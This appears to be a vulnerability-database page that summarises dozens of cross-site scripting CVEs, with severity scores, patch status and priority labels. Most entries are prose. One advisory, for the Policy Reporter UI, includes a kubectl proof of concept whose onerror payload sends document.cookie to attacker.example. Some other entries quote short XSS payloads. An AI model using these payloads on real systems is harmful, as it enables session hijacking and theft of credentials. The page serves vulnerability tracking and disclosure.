Cross-site scripting in wlc command-line client versions prior to 2.0.0 allows authenticated users with high privileges to inject malicious HTML/JavaScript into API responses, which are then embedded unescaped in HTML output. When the HTML output is rendered in a browser, this enables XSS attacks. The vulnerability requires explicit use of the HTML output format (non-default), user interaction to open/view the HTML file, and elevated API credentials, limiting real-world risk despite the network vector.

XSS Wlc
NVD GitHub
EPSS 0% CVSS 2.1
LOW Monitor

Reflected cross-site scripting (XSS) in SourceCodester Pizzafy Ecommerce System 1.0 via the page parameter in /admin/index.php allows remote attackers to inject malicious scripts that execute in a victim's browser with user interaction. CVSS 2.1 (low) reflects the requirement for user click-through; however, the vulnerability is disclosed publicly with proof-of-concept code available.

XSS PHP
NVD GitHub VulDB
EPSS 0% CVSS 6.1
MEDIUM This Month

In Thruk Monitoring through 2.46.3, the login field of the login form is vulnerable to reflected XSS. Rated medium severity (CVSS 6.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. No vendor patch available.

XSS
NVD
EPSS 1% CVSS 5.4
MEDIUM POC This Month

SOPlanning 1.52.00 is vulnerable to Cross Site Scripting (XSS) via the groupe_id parameter to process/groupe_save.php. Rated medium severity (CVSS 5.4), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

PHP XSS
NVD GitHub
EPSS 0% CVSS 6.1
MEDIUM PATCH This Month

A Cross Site Scripting vulnerability in Alkacon OpenCms before 16 exists via updateModelGroups.jsp. Rated medium severity (CVSS 6.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. This Cross-Site Scripting (XSS) vulnerability could allow attackers to inject malicious scripts into web pages viewed by other users.

XSS
NVD VulDB
EPSS 1% CVSS 6.1
MEDIUM POC PATCH This Month

A Cross Site Scripting vulnerability in Alkacon OpenCms before 10.5.1 exists via cmis-online/type. Rated medium severity (CVSS 6.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available.

XSS
NVD VulDB
EPSS 0% CVSS 5.9
MEDIUM This Month

Reflected HTML injection in GitHub Enterprise Server Management Console login page allows credential theft when administrators click crafted links. The /setup/unlock endpoint reflects the redirect_to query parameter into an HTML attribute without sanitization, enabling attackers to inject malicious form elements that capture credentials. Affects versions 3.19.1-3.19.5 and 3.20.0-3.20.1; fixed in 3.19.6 and 3.20.2. Exploitation requires user interaction (administrator clicking a link), limiting real-world impact despite network-accessible attack surface.

XSS Enterprise Server
NVD GitHub VulDB
EPSS 0% CVSS 5.1
MEDIUM PATCH This Month

Unauthenticated reflected cross-site scripting (XSS) in Vvveb before 1.0.8.2 allows remote attackers to execute arbitrary JavaScript in the context of the Vvveb origin by manipulating the r query parameter and _component_ajax POST parameter in the visual editor preview renderer. The vulnerability exploits the absence of session, role, or token verification in the isEditor() gating function combined with unsanitized injection of POST body content, requiring only user interaction to trigger but affecting all versions prior to 1.0.8.2. Active exploitation status is not confirmed, but a vendor-released patch is available.

XSS Vvveb
NVD GitHub
EPSS 0% CVSS 8.8
HIGH PATCH NO ACTION HOSTED Monitor

Cross-site scripting (XSS) in Azure Machine Learning enables remote attackers to execute arbitrary JavaScript in victim browsers via crafted input, achieving complete session compromise including credential theft, workspace manipulation, and model poisoning. Attacker requires no authentication but must convince a user to interact with a malicious link or input. Microsoft has released patches per MSRC advisory. CVSS 8.8 severity reflects the high impact across confidentiality, integrity, and availability once user interaction occurs. No evidence of active exploitation (not in CISA KEV) and EPSS data not provided.

XSS Microsoft
NVD VulDB
EPSS 0% CVSS 4.7
MEDIUM PATCH This Month

DOM-based cross-site scripting (XSS) in i18nextify versions prior to 4.0.8 allows remote attackers to execute arbitrary JavaScript by injecting malicious URL schemes (javascript:, data:, vbscript:, file:) into translated href and src attribute values. An attacker who can compromise the translation backend, CDN, or intercept unencrypted traffic can inject payloads that execute with the origin's privileges when users interact with the affected links or embedded content. The vulnerability requires user interaction (clicking a link or loading a page with a malicious src) but affects any website using i18nextify with untrusted translation sources.

XSS I18Nextify
NVD GitHub VulDB
EPSS 0% CVSS 6.1
MEDIUM PATCH This Month

Cross-site scripting (XSS) vulnerability in Go's html/template library allows attackers to bypass URL escaping in meta tag content attributes by inserting ASCII whitespaces around the equals sign, enabling injection of malicious scripts into web applications. Affects Go 1.25.x before 1.25.10 and 1.26.x before 1.26.3. This is a regression from CVE-2026-27142 where the fix was incomplete, and exploitation requires user interaction (UI:R) but operates across security boundaries (S:C).

XSS Html Template Red Hat
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored XSS in FacturaScripts product search modal allows authenticated warehouse users to inject malicious JavaScript via product reference field, which executes in the browser of any user opening the search modal in sales or purchase documents. An attacker with warehouse write access can escalate privileges by executing arbitrary authenticated requests in an administrator's session, including creation of new admin accounts, without requiring the admin's password. The vulnerability exploits improper output encoding combined with HTML parser re-interpretation during innerHTML assignment.

XSS PHP Privilege Escalation
NVD GitHub VulDB
EPSS 0% CVSS 3.9
LOW Monitor

Reflected cross-site scripting in FacturaScripts allows authenticated attackers to execute arbitrary JavaScript via manipulation of the fsNick cookie parameter. The application renders the cookie value directly into the HTML without sanitization, permitting script execution before session termination and logout redirection. CVSS score is 3.9 with low impact due to login requirement and single-action execution window.

XSS
NVD GitHub
EPSS 0% CVSS 8.1
HIGH PATCH This Week

Session hijacking via JavaScript-readable authentication cookies in Budibase versions prior to 3.35.10 allows any Cross-Site Scripting (XSS) vulnerability to escalate into full account takeover. The budibase:auth cookie containing the JWT session token is set with httpOnly: false, enabling JavaScript to read it via document.cookie. Combined with confirmed prior XSS vulnerabilities in Budibase (GHSA-gp5x-2v54-v2q5), attackers can exfiltrate session tokens and gain persistent access to victim accounts. The cookie also lacks secure and sameSite flags, exposing tokens over plaintext HTTP. No public exploit identified at time of analysis. EPSS data not available. Patch available in version 3.35.10.

XSS Budibase
NVD GitHub VulDB
EPSS 0% CVSS 7.0
HIGH PATCH This Week

Cross-site scripting in BentoPDF's Markdown to PDF Tool allows remote attackers to execute arbitrary JavaScript when users interact with malicious Markdown content. Affects all versions prior to 2.8.3. Vendor-released patch version 2.8.3 available with immediate upgrade recommended by maintainer. No public exploit identified at time of analysis, though vulnerability was responsibly disclosed by independent researcher. CVSS 7.0 with network attack vector but requires user interaction, reducing automation potential.

XSS Bentopdf
NVD GitHub
EPSS 0% CVSS 7.2
HIGH This Week

Cross-site scripting (XSS) in Postorius mail list management interface allows unauthenticated remote attackers to inject malicious scripts via crafted email subjects in held messages. Active exploitation confirmed in May 2026 per vendor disclosure. Affects all versions through 1.3.13. Public exploit code available via GitLab merge request #972. EPSS data not yet available for this recent CVE, but confirmed in-the-wild activity elevates priority significantly despite moderate CVSS 7.2 score.

XSS Postorius
NVD VulDB
EPSS 0% CVSS 7.6
HIGH PATCH This Week

Stored XSS in FreeScout's auto-reply feature allows authenticated users with updateAutoReply permission to inject malicious scripts that execute in customer email clients. Every customer contacting the affected mailbox receives the weaponized auto-reply email, where the payload executes without CSP protection in webmail or email client contexts. The vulnerability affects FreeScout versions prior to 1.8.217, which contains the vendor-released patch. EPSS data not provided, no CISA KEV listing indicates limited observed exploitation despite the chain-reaction impact potential.

XSS Freescout
NVD GitHub
EPSS 0% CVSS 7.3
HIGH PATCH This Week

Cross-site scripting (XSS) vulnerability in PHP 8.2.x (prior to 8.2.31) allows network-based attackers to inject malicious scripts that execute in victim browsers, compromising session tokens and potentially escalating to account takeover. Vendor-released patch (PHP 8.2.31) addresses this along with seven additional CVEs in a coordinated security release. CVSS 7.3 HIGH with user interaction required; exploitation status classified as POC-available per CVSS 4.0 vector (E:P), though public exploit code not independently verified at time of analysis.

XSS Microsoft PHP +2
NVD GitHub VulDB
EPSS 0% CVSS 5.4
MEDIUM PATCH This Month

Stored cross-site scripting (XSS) in Webkul Krayin CRM v2.1.5 allows authenticated users to inject malicious scripts via unsanitized input in the Activity comment field on the /admin/activities/create endpoint, which execute when viewed by other administrators. The vulnerability requires user interaction (viewing the compromised activity) and authenticated access, limiting scope to C (confidentiality) and I (integrity) with partial impact; publicly available proof-of-concept code exists but exploitation is not confirmed in the wild. Fixed in version v2.1.6 via application of input sanitization using strip_tags() across multiple vulnerable Blade templates.

XSS
NVD GitHub
EPSS 0% CVSS 7.1
HIGH This Week

Reflected cross-site scripting in Bricks Builder WordPress theme through version 1.9.2 to 2.2 enables remote attackers to execute malicious JavaScript in victim browsers by crafting URLs with unsanitized input that gets reflected into generated web pages without proper encoding. Exploitation requires victim interaction (clicking a malicious link) but no authentication, making phishing and social engineering viable delivery methods. EPSS and KEV data not available; no public exploit confirmed at time of analysis, though Patchstack disclosure suggests security researchers have demonstrated the vulnerability.

XSS Bricks Builder
NVD
EPSS 0% CVSS 8.8
HIGH PATCH This Week

Stored cross-site scripting in DivvyDrive 4.8.2.9 through 4.8.3.1 enables remote attackers to inject malicious scripts that execute in victim browsers with high integrity impact (CVSS 8.8). The vulnerability requires user interaction but no authentication, allowing attackers to compromise confidentiality, integrity, and availability of user sessions. Reported by TR-CERT with vendor patch released in version 4.8.3.2. No confirmed active exploitation (not in CISA KEV) and no public exploit code identified at time of analysis.

XSS Divvydrive
NVD
EPSS 0% CVSS 8.8
HIGH PATCH This Week

Cross-site scripting (XSS) in DivvyDrive 4.8.2.9 through 4.8.3.1 allows remote unauthenticated attackers to execute arbitrary JavaScript in victim browsers, leading to session hijacking, credential theft, and malicious actions performed under victim's identity. The CVSS score of 8.8 (High) reflects the broad impact scope (confidentiality, integrity, availability all rated High), though user interaction is required. TR-CERT disclosure indicates awareness within Turkish government cybersecurity circles, but no CISA KEV listing or public exploit code identified at time of analysis, suggesting limited active exploitation outside potential targeted campaigns.

XSS Divvydrive
NVD
EPSS 0% CVSS 6.8
MEDIUM PATCH This Month

Stored cross-site scripting in MISP before 2.5.37 allows authenticated users with template modification permissions to inject arbitrary JavaScript via unvalidated type and category fields in template element attributes. The vulnerability exploits insufficient input validation in the template element attribute handling logic, enabling attackers to store malicious payloads that execute in the browsers of other users viewing the affected templates. No public exploit code identified at time of analysis.

XSS Misp
NVD GitHub VulDB
EPSS 0% CVSS 8.8
HIGH This Week

Cross-site scripting in Gosoft Proticaret E-Commerce v5.0.0 through v6.0.1767.1383 allows remote attackers to execute arbitrary JavaScript in victim browsers via crafted HTTP requests. Despite the 8.8 CVSS score indicating complete compromise (High C/I/A), the CVSS vector reveals this is a reflected XSS requiring user interaction (UI:R), not a stored or blind XSS. The vulnerability is unscoped (S:U), meaning impact is confined to the vulnerable application. No active exploitation confirmed via CISA KEV and no public exploit code identified at time of analysis. TR-CERT advisory available with remediation guidance.

XSS Proticaret E Commerce
NVD
EPSS 0% CVSS 5.9
MEDIUM This Month

DOM-based cross-site scripting (XSS) in WEN Logo Slider WordPress plugin through version 3.4.0 allows authenticated high-privilege users to inject malicious scripts that execute in the browsers of other site visitors when the UI redirects the page, potentially compromising site integrity and user data. The vulnerability requires high-privilege administrator access and user interaction (page redirect), limiting its practical scope to insider threats or compromised admin accounts.

XSS Wen Logo Slider
NVD
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

Stored cross-site scripting (XSS) in WProyal Royal Elementor Addons before version 1.7.1053 allows authenticated users with limited privileges to inject malicious scripts into web pages, which execute in the browsers of site visitors. The vulnerability requires user interaction (UI:R in CVSS) and is limited to users with login credentials (PR:L), but once stored, affects all visitors regardless of their privileges. An attacker with contributor or editor access can compromise website visitors, steal session cookies, or perform actions on their behalf.

XSS Royal Elementor Addons Elementor
NVD
EPSS 0% CVSS 4.3
MEDIUM PATCH This Month

Cross-site scripting (XSS) via improper Markdown attribute sanitization in Weblate allows authenticated users to inject malicious HTML attributes through crafted Markdown in user comments and other user-provided content. The vulnerability affects Weblate versions prior to 5.17.1 and can be exploited by any authenticated user with the ability to submit Markdown content; however, the application's strict Content Security Policy (CSP) significantly mitigates actual exploitation risk. Vendor-released patch version 5.17.1 is available.

XSS Suse
NVD GitHub
EPSS 0% CVSS 6.1
MEDIUM PATCH This Month

Sidekiq-cron thru 2.3.1, an open-source scheduling add-on for Sidekiq, is vulnerable to a cross-site scripting (xss) vulnerability via crafted URL being rended from cron.erb.

XSS N A Red Hat
NVD GitHub
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored Cross-Site Scripting in PHPGurukal Hospital Management System v4.0 allows authenticated patients to inject malicious scripts via the User Name parameter on the edit-profile.php page, with the payload later executed in the doctor's interface. The vulnerability requires user interaction (doctor viewing the profile) and affects confidentiality and integrity with limited scope. No public exploit code or active exploitation has been confirmed at analysis time.

XSS PHP N A
NVD GitHub
EPSS 0% CVSS 4.7
MEDIUM PATCH This Month

HTML injection via unvalidated JSX tag names in hono allows attackers to inject arbitrary HTML elements and attributes when untrusted input is used as tag names during server-side rendering. The vulnerability affects hono versions prior to 4.12.16 when the `jsx()` or `createElement()` APIs process attacker-controlled tag names, potentially enabling XSS attacks. User interaction (rendering untrusted content) is required, and the issue is limited to applications that dynamically construct tag names from external sources rather than using static or allowlisted tags.

XSS
NVD GitHub
EPSS 0% CVSS 6.1
MEDIUM PATCH This Month

### Summary Vue 3's v-html directive is the framework-documented mechanism for injecting raw HTML, and it intentionally disables the auto-escaping that {{ }} interpolation provides. The PropertyCard.vue component uses v-html for the else branch of the URL check, meaning any non-URL string value flows directly into the DOM as HTML. The isURL() guard only filters values that parse as http: or https: URLs, so any HTML payload not starting with those schemes (e.g., `<img src=x onerror=alert(1)>` padded to exceed 75 chars) bypasses it entirely. The data originates from Kubernetes PolicyReport .results[].properties fields, which are arbitrary string maps populated by policy engines and potentially by any principal with write access to PolicyReport objects in the cluster. No DOMPurify or equivalent HTML sanitization library is present anywhere in the frontend codebase, confirming there is no compensating control between the API response and the sink. This vulnerability was reproduced on the latest policy reporter UI version - 2.5.1. ### PoC Prerequisites: Kubernetes write access to PolicyReport resources in the target cluster (e.g., via a policy engine service account or direct kubectl access) Create a Kubernetes PolicyReport resource with a crafted property value longer than 75 characters. When an authenticated Policy Reporter UI user browses to the affected namespace and expands the result row containing this property, the injected script executes in their browser. ```bash kubectl apply -f - <<'EOF' apiVersion: [wgpolicyk8s.io/v1alpha2](http://wgpolicyk8s.io/v1alpha2) kind: PolicyReport metadata: name: xss-poc namespace: default results: - message: "test" policy: xss-test-policy rule: check-rule result: fail properties: # Value > 75 chars and not an http/https URL -> routed to v-html sink advisory: "<img src=x onerror=\"fetch('[https://attacker.example/c?c='+document.cookie](https://attacker.example/c?c=%27+document.cookie))\"> padding padding padding" EOF # Once a UI user opens the results table for the 'default' namespace # and expands the 'xss-test-policy' result row, the onerror handler fires # and exfiltrates their session cookies to attacker.example ``` <img width="1562" height="1061" alt="Снимок экрана - 2026-04-21 в 10 52 17" src="https://github.com/user-attachments/assets/fe542ccb-1662-44cb-802f-7998aa145db7" /> <img width="1041" height="939" alt="Снимок экрана - 2026-04-21 в 10 51 44" src="https://github.com/user-attachments/assets/bc07cf20-aea5-4a90-838f-c428d88a92b7" /> ### Impact XSS

Kubernetes XSS
NVD GitHub
EPSS 0% CVSS 8.6
HIGH PATCH This Week

JupyterLab's CommandLinker executes arbitrary commands via single-click social engineering when users open malicious notebooks shared through email, GitHub, or Binder links. Attackers embed deceptive HTML buttons with allowlisted data-commandlinker-* attributes in pre-saved notebook output cells to trigger commands without code execution submission, enabling immediate arbitrary code execution in available kernels, silent file deletion, or resource exhaustion in multi-tenant deployments. The patched version 4.5.7 was released by the JupyterLab team through GitHub advisory GHSA-mqcg-5x36-vfcg. Chromium browser users face expanded terminal access risk through multi-click clipboard permission abuse. Third-party JupyterLab extensions increase attack surface by exposing additional commands to exploitation.

XSS RCE Google
NVD GitHub VulDB
EPSS 0% CVSS 8.6
HIGH PATCH This Week

Reflected cross-site scripting in Flight PHP framework's JSONP endpoint implementation allows remote attackers to execute arbitrary JavaScript in victim browsers by injecting malicious code through unvalidated callback parameters. Flight PHP versions prior to 3.18.1 concatenate user-supplied `jsonp` query parameters directly into JavaScript responses without identifier validation, enabling cookie theft and session hijacking when vulnerable endpoints are embedded via script tags. The vulnerability was patched in version 3.18.1 (commit b8dd23a) with regex validation limiting callbacks to legal JavaScript identifiers. A working proof-of-concept demonstrates cookie exfiltration via crafted callback parameters.

XSS PHP
NVD GitHub
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

Reflected cross-site scripting (XSS) in OpenMage Magento LTS versions up to 20.17.0 allows authenticated admin users to inject arbitrary JavaScript via the Import/Export Dataflow Profiles run interface. The vulnerability exists in the System → Import/Export → Dataflow Profiles page where unsanitized filename parameters are reflected into HTML context, enabling cookie theft and admin panel defacement. The exploitation requires admin panel access and user interaction to click a malicious link, but no network-based unauthenticated exploitation is possible.

XSS PHP
NVD GitHub
EPSS 0% CVSS 3.1
LOW PATCH Monitor

Inappropriate implementation in MHTML in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who convinced a user to engage in specific UI gestures to leak cross-origin data via a crafted MHTML page. (Chromium security severity: Low)

XSS Google Chrome
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM PATCH This Month

Inappropriate implementation in MHTML in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to inject arbitrary scripts or HTML (UXSS) via a crafted HTML page. (Chromium security severity: Low)

XSS Google Red Hat +2
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM PATCH This Month

Uncontrolled XSS vulnerability in Google Chrome's ServiceWorker implementation prior to version 148.0.7778.96 allows attackers to inject arbitrary scripts or HTML into web pages when users install a malicious Chrome extension, bypassing same-origin policy protections. The vulnerability requires user interaction (extension installation) but can be exploited remotely with low attack complexity. CVSS score of 5.4 reflects medium severity; no active exploitation has been publicly reported.

XSS Google Red Hat +2
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM PATCH This Month

Google Chrome versions prior to 148.0.7778.96 contain an XSS vulnerability in the SanitizerAPI that allows remote attackers to inject arbitrary scripts or HTML through crafted HTML pages. The vulnerability requires user interaction (visiting a malicious page) but carries medium severity due to its ability to compromise confidentiality and integrity. No public exploit code or active exploitation in CISA KEV has been identified at the time of analysis.

XSS Google Red Hat +2
NVD VulDB
EPSS 0% CVSS 3.7
LOW Monitor

HCL BigFix Service Management (SM) contains a Content Security Policy (CSP) header misconfiguration that enables cross-site scripting (XSS) attacks. Authenticated users with low privileges can inject malicious scripts by exploiting insufficient CSP directives, potentially exposing sensitive information or hijacking user sessions. The vulnerability requires user interaction (UI:R) and operates in a non-global scope, limiting but not eliminating real-world risk.

XSS Bigfix Service Management Sm
NVD
EPSS 0% CVSS 3.1
LOW Monitor

HCL DFXAnalytics relies on the obsolete X-XSS-Protection security header instead of implementing a modern Content Security Policy, allowing attackers with low privileges to potentially exploit browser-specific XSS protections or bypass intended security controls. The vulnerability requires high attack complexity and authenticated access, limiting practical exploitation but indicating security posture degradation in a production analytics platform.

XSS Dfxanalytics
NVD VulDB
EPSS 0% CVSS 5.3
MEDIUM This Month

HCL DFXAnalytics fails to enforce strict Content-Security-Policy (CSP) directives for object-src and base-uri, enabling attackers to inject and execute arbitrary scripts through cross-site scripting (XSS) vectors without authentication or user interaction. This network-accessible vulnerability affects all versions and results in information disclosure with a CVSS score of 5.3; no active exploitation has been reported.

XSS Dfxanalytics
NVD VulDB
EPSS 0% CVSS 7.3
HIGH PATCH This Week

Stored cross-site scripting (XSS) in Zabbix 6.0-7.4 allows authenticated attackers with high privileges to inject malicious JavaScript via monitored host data that executes when other users view dashboards containing Item history widgets (7.0+) or Plain text widgets (6.0). The attack requires the attacker to control a monitored host and the victim to open a dashboard with HTML display enabled in the affected widget. CVSS 7.3 reflects high impact but requires specific preconditions: high-privilege access (PR:H), user interaction (UI:P), and precise attack timing (AT:P). No CISA KEV listing or public exploit identified at time of analysis, with low immediate exploitation risk given the privilege requirements.

XSS Zabbix Suse
NVD VulDB
EPSS 0% CVSS 7.3
HIGH POC PATCH This Week

Stored Cross-Site Scripting (XSS) in Zabbix 7.0.x and 7.4.x allows authenticated administrators with non-super privileges to inject JavaScript payloads into maintenance period configurations. The malicious code executes when any user, including super admins, hovers over the affected maintenance period in the Host navigator widget tooltip, enabling session hijacking, credential theft, or unauthorized administrative actions with the victim's elevated privileges. Attack complexity is low and requires only user interaction (hovering), though exploit execution depends on victim access patterns. No public exploit code or active exploitation confirmed at time of analysis.

XSS Suse
NVD VulDB GitHub
EPSS 0% CVSS 7.2
HIGH This Week

Stored Cross-Site Scripting in LatePoint Calendar Booking Plugin for WordPress allows unauthenticated remote attackers to inject malicious JavaScript via the 'first_name' parameter in appointment booking forms, affecting all versions through 5.5.0. The injected scripts persist in the database and execute whenever administrators or other users view booking records, potentially enabling session hijacking, privilege escalation, or further attacks against site administrators. The CVSS vector indicates network-accessible exploitation with no authentication required and changed scope, enabling attacks beyond the vulnerable component. EPSS score not provided; no confirmation of active exploitation (not in CISA KEV) or public exploit code at time of analysis.

XSS WordPress
NVD VulDB
EPSS 0% CVSS 7.2
HIGH This Week

Stored cross-site scripting (XSS) in LatePoint WordPress booking plugin (versions ≤5.5.0) allows unauthenticated attackers to inject malicious scripts via the 'booking_form_page_url' parameter that execute when administrators view activity logs. The vulnerability exploits a design flaw where the latepoint_order_intent_created action hook writes unsanitized input to the database before Stripe Connect validation occurs, meaning no functional payment integration is required for exploitation. Wordfence reported this issue with source code references demonstrating the flawed input handling in activities_controller.php and activities_helper.php. CVSS 7.2 with scope change (S:C) reflects potential for attackers to pivot from stored XSS to administrative session hijacking.

XSS WordPress
NVD VulDB
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored cross-site scripting in LatePoint calendar booking plugin for WordPress versions up to 5.5.0 allows authenticated customers to inject malicious scripts via unsanitized profile fields (first name, last name, phone, notes) that execute in administrators' browsers when notification templates are previewed. Exploitation requires customer-level access and admin interaction to preview a notification template, but achieves code execution in a high-privilege context (administrator or agent browser session) with scope change from single user to multiple users.

XSS WordPress
NVD VulDB
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored Cross-Site Scripting in SliceWP Affiliates plugin for WordPress (versions up to 1.2.7) allows authenticated contributors and above to inject arbitrary JavaScript via unsanitized shortcode attributes in the 'slicewp_affiliate_url' shortcode. The injected scripts execute in the browsers of all users accessing the affected page, enabling account compromise, credential theft, or malware distribution. No public exploit code or active exploitation has been identified, but the vulnerability is straightforward to exploit given the low attack complexity and requires only contributor-level WordPress access.

XSS WordPress
NVD VulDB
EPSS 0% CVSS 6.1
MEDIUM PATCH This Month

Cross-site scripting (XSS) vulnerability in Apache Wicket allows unauthenticated remote attackers to inject malicious JavaScript through crafted strings that break out of JavaScript sequence contexts. Affected versions include Wicket 8.0.0-8.17.0, 9.0.0-9.22.0, and 10.0.0-10.8.0. User interaction (e.g., clicking a malicious link) is required for exploitation. EPSS score of 0.03% (8th percentile) indicates low empirical exploitation probability despite network-accessible attack vector.

XSS Apache
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored cross-site scripting in Juzaweb CMS 5.0.0 allows authenticated remote attackers to inject arbitrary JavaScript via the Add Banner Ads function, exploitable with user interaction (page visit). The vulnerability enables credential theft, session hijacking, and defacement of administrative interfaces. A proof-of-concept is publicly available on GitHub, though exploitation requires authenticated access and victim interaction with a malicious payload.

XSS RCE N A
NVD GitHub
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

Cross-site scripting (XSS) vulnerabilities in ip-address library versions up to 10.1.0 allow attackers to inject arbitrary JavaScript code when untrusted input is passed to Address6.group(), Address6.link(), Address6 constructor (via AddressError.parseMessage), or v6.helpers.spanAll() methods and their output is rendered as HTML. The vulnerability affects four separate code paths that fail to HTML-escape user-controlled content before embedding it in returned HTML strings or error messages. Real-world exposure is extremely limited because security research found zero consumers of these HTML-emitting methods across 425 dependent npm packages and public code repositories; applications using only parsing and comparison APIs are unaffected.

XSS Node.js
NVD GitHub VulDB
EPSS 0% CVSS 8.9
HIGH PATCH This Week

Stored cross-site scripting in Grav CMS allows low-privileged users with page-creation permissions to inject malicious SVG payloads that execute when administrators view the page. The vulnerability stems from regex-based XSS detection that fails to catch unquoted event handlers and omits SVG/MathML from dangerous tags. Exploitation exfiltrates the admin-nonce token from /admin/config/info, enabling CSRF bypass and chained remote code execution through scheduled tasks or plugin endpoints. GitHub advisory GHSA-w8cg-7jcj-4vv2 confirms exploit details; patch available in Grav 2.0.0-beta.2 (commit 5a12f9be8). CVSS 8.9 (High) with network attack vector, low complexity, and scope change reflecting cross-context session hijacking.

PHP CSRF XSS +2
NVD GitHub
EPSS 0% CVSS 8.5
HIGH PATCH This Week

Stored cross-site scripting in Grav CMS allows publisher-level authenticated users to execute arbitrary JavaScript in victim browsers by injecting unquoted HTML event handlers that bypass the detectXss() blacklist regex. The flawed pattern failed to detect on* event attributes without surrounding quotes, enabling payloads like <img src=x onerror=eval(...)> to persist in content fields and execute when administrators or other users view the compromised page. Vendor-released patch confirmed in commit 5a12f9be8 (Grav 2.0.0-beta.2), which tightens the on_events regex to flag unquoted attributes, adds dangerous XML namespace tags (svg, math) to the default blocklist, and hardens MediaObjectTrait::attribute() with strict identifier validation. Publicly available exploit code exists. EPSS and KEV data not provided; exploitation requires publisher-level account privileges.

XSS PHP
NVD GitHub
EPSS 0% CVSS 5.4
MEDIUM PATCH This Month

Stored cross-site scripting in Grav CMS Form plugin allows editor-level users to inject arbitrary JavaScript via taxonomy tag and category values that execute in administrator browsers when viewing any page in the admin panel. The vulnerability exploits unescaped Twig `|raw` filters in the select field template combined with a bypassable XSS detection regex, enabling privilege escalation through nonce theft and unauthorized admin actions. Vendor-released patch available in grav-plugin-form 9.0.1 and Grav core 2.0.0-beta.2.

XSS PHP Privilege Escalation
NVD GitHub
EPSS 0% CVSS 6.9
MEDIUM PATCH This Month

Stored cross-site scripting in Grav CMS via Markdown media attribute injection allows authenticated page editors to inject executable JavaScript event-handler attributes into rendered image HTML. An editor can craft Markdown syntax like `![alt](image.gif?attribute=onload,alert(1))` which bypasses the attribute() media method's input validation and renders as `<img onload="alert(1)">`, executing arbitrary JavaScript in the browsers of any user viewing the affected page, including administrators and reviewers in multi-user installations. Publicly available patch confirmed in version 2.0.0-beta.2.

XSS PHP
NVD GitHub
EPSS 0% CVSS 7.3
HIGH PATCH This Week

Stored Cross-Site Scripting in YAFNET forum software allows authenticated attackers to inject arbitrary JavaScript into thread posts and replies that automatically executes in the browser of every user who views the affected thread. Affects YAFNET.Core versions ≤3.2.11 and 4.0.0-beta01 through 4.0.4. The payload triggers on page load without victim interaction, enabling session hijacking, credential theft, and account takeover of all viewers including administrators. Vendor-released patches are available (v3.2.12 and v4.0.5). No active exploitation confirmed by CISA KEV, though the attack requires only a standard forum account and proof-of-concept payload is documented in the GitHub advisory.

XSS
NVD GitHub
EPSS 0% CVSS 8.1
HIGH PATCH This Week

Remote unauthenticated attackers can execute JavaScript in administrator sessions of YAF.NET forum software (versions ≤3.2.11 and 4.0.0-beta01 through 4.0.4) by injecting malicious User-Agent headers via any endpoint that triggers exception logging, notably /api/Attachments/GetAttachment. The stored XSS payload fires when administrators view the Event Log admin panel, enabling full forum takeover through admin-session hijacking. A working proof-of-concept exists requiring only a single anonymous HTTP request. EPSS and KEV data not available; CVSS 8.1 (High) reflects network vector, low complexity, and no authentication requirement, though the UI:R metric indicates the admin must visit the log page for execution.

XSS CSRF
NVD GitHub
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

Reflected cross-site scripting in Go Fiber's AutoFormat() method allows remote attackers to inject arbitrary HTML and JavaScript by sending Accept: text/html headers with attacker-controlled data passed to AutoFormat(). The vulnerability affects Fiber v3 through 3.1.0 and v2 through 2.52.12, where the HTML output branch concatenates user data directly into markup without escaping, while all other format branches (JSON, XML, MsgPack, CBOR) properly sanitize output. A proof-of-concept demonstrates script injection via query parameters when HTML content negotiation is selected by an attacker.

XSS
NVD GitHub VulDB
EPSS 0% CVSS 6.1
MEDIUM PATCH This Month

Reflected XSS in AVideo's Meet plugin allows unauthenticated attackers to execute arbitrary JavaScript in a victim's browser by injecting unescaped user and pass query parameters into a JavaScript string literal. The vulnerability is reachable without authentication on any public Meet schedule with no password (the default configuration), enabling session cookie theft and account takeover of authenticated users. CVSS 6.1 (AV:N/AC:L/PR:N/UI:R/S:C) reflects network delivery requiring user interaction but changed scope due to cookie exfiltration across the AVideo application origin.

XSS PHP CSRF
NVD GitHub
EPSS 0% CVSS 6.4
MEDIUM PATCH This Month

Stored HTML injection in AVideo's notifySubscribers endpoint allows any authenticated uploader to broadcast platform-branded phishing emails to up to 10,000 channel subscribers without sanitization, escaping, or rate limits. The attacker-supplied HTML is injected directly into the email template via str_replace and rendered by PHPMailer, arriving with the platform's official contact email address, logo, and site title, enabling credential theft and reconnaissance at scale with no visible indication that content originated from an uploader rather than the platform operator.

Canonical XSS PHP +1
NVD GitHub
EPSS 0% CVSS 7.2
HIGH PATCH This Week

Unauthenticated remote code execution in AVideo ≤29.0 allows attackers to inject and execute arbitrary JavaScript in the browsers of any logged-in users through a WebSocket message relay bypass. An attacker obtains a WebSocket token without authentication from plugin/YPTSocket/getWebSocket.json.php, connects to the WebSocket server, and sends a crafted message with autoEvalCodeOnHTML nested under the json field instead of msg. The incomplete server-side sanitization from prior fix c08694bf6 (GHSA-gph2-j4c9-vhhr) only strips autoEvalCodeOnHTML from $json['msg'], but the relay function msgToResourceId() preferentially selects $msg['json'] as the outbound message carrier. The payload bypasses sanitization, reaches the victim's browser via WebSocket relay, and executes through eval() at plugin/YPTSocket/script.js:573-575. Vendor-released patch: commit 9f3006f9a (recursive stripping across all message carriers). No public exploit identified at time of analysis, but the advisory includes functional proof-of-concept Python code.

PHP CSRF Python +4
NVD GitHub
EPSS 0% CVSS 3.7
LOW PATCH Monitor

